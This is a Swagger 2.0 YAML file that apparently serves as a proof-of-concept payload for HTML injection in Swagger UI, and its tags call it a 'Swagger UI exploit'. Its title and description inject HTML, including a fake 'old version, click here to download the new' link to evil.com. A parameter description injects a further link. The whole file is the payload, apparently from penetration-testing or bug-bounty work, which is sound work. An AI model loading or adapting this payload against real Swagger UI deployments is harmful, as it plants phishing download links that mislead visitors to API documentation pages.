---
swagger: '2.0'
info:
  title: ||||There is html injection here 0xbartita|||| 
  description: |
   This is old version plaese click here to download the new <h2><a href="https://evil.com">Download</a></h2>

  version: production
basePath: https://target.com
produces:
- application/xml
- application/json
consumes:
- application/xml
- application/json
security:
- basicAuth: []
paths:
  "/s1rn3tz":
    get:
      responses:
        '200':
          description: No response was specified
      tags:
      - Mathis Pais De Sousa
      operationId: findAccounts
      summary: this is example text
  "/exploited_by_s1rn3tz":
    delete:
      parameters:
      - description: |
          <a href=https://s1rn3tz.gitbook.io>blog</a>

        format: int64
        in: path
        name: id
        required: true
        type: integer
      responses:
        '200':
          description: No response was specified
      tags:
      - Swagger UI exploit
      operationId: swagger
      summary: swagger
    get:
      parameters:
      - description: this is example text
        format: int64
        in: path
        name: id
        required: true
        type: integer
      responses:
        '200':
          description: No response was specified
      tags:
      - Swagger UI exploit
      operationId: some_operation
      summary: this is example text
